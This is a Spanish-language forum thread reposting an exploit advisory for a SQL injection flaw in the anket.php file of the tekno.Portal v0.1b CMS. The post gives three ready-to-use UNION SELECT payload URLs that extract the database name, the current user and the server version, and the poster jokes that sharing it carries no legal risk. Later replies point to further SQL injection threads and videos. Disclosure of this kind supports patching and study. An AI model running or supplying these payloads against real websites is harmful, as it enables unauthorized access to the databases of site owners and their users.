agosto 05, 2021, 06:30:03 pm

Noticias:

Para hacer tu consulta: debes registrarte y hacer un nuevo tema en la sección que consideres más adecuada. Ver: Acerca de este Foro.


[Bug] Tekno.Portal - SQL Injection [by Socket_0x03]

Iniciado por Speed, enero 20, 2013, 02:08:52 am

Tema anterior - Siguiente tema

Speed




               ======================================================
               tekno.Portal v0.1b - SQLi Vulnerability in "anket.php"
               ======================================================


____________________________________________________________________________________


 # Exploit Title: tekno.Portal v0.1b - SQLi Vulnerability in "anket.php"

 # Date: [07-25-2012]

 # Category: Webapps
____________________________________________________________________________________


 # Author: Socket_0x03 (Alvaro J. Gene)

 # Email: [email protected]

 # Website: http://www.teraexe.com

____________________________________________________________________________________

 # Software Link: http://sourceforge.net/projects/teknoportal

 # Vulnerable Application: tekno.Portal

 # Version: 0.1b

 # Vulnerable File: anket.php

 # Language: This application is available only in turkish language.

 # Product Description: Tekno.Portal is a content management system (CMS) developed
   in PHP; furthermore, a webmaster can use this application to manage files, store
   data, and more.
   
____________________________________________________________________________________


 # SQL Injection:
 
   http://www.website.com/teknoportal/anket.php?id=[SQLi]

 # Examples of SQLi:

   http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,database(),5
   http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,user(),5
   http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,@@version,5

____________________________________________________________________________________

 # More:

   [url=http://www.securityfocus.com/bid/54698]www.securityfocus.com/bid/54698[/url]


JorgeAVM

¿Esto es un tuto para vulnerar un sitio en específico? :o

Speed

No, es una vulnerabilidad de SQL injection que se encuentra en un programa que fue creado en PHP.

No te preocupes que no vas a tener problemas legales por algo como eso... Jajajajaja xD

Al final tiene un link que va a Securityfocus en donde dan algunos detalles de la vulnerabilidad...

Saludos!

JorgeAVM


Speed

Tiempo que no me pasaba por aquí =)

Los tres temas que traje tienen que ver con las inyecciones SQL:

-Inyección SQL basada en error
-Inyección SQL a ciega
-Inyección SQL basada en tiempo

JorgeAVM


Speed

Aquí estoy de nuevo para darle un poquito más de vida a esta área que se ve un poco apagada...

Aparte de los bugs, también agregue unos cuantos videos... Tantos avanzados como básicos...

Buscar en el Foro: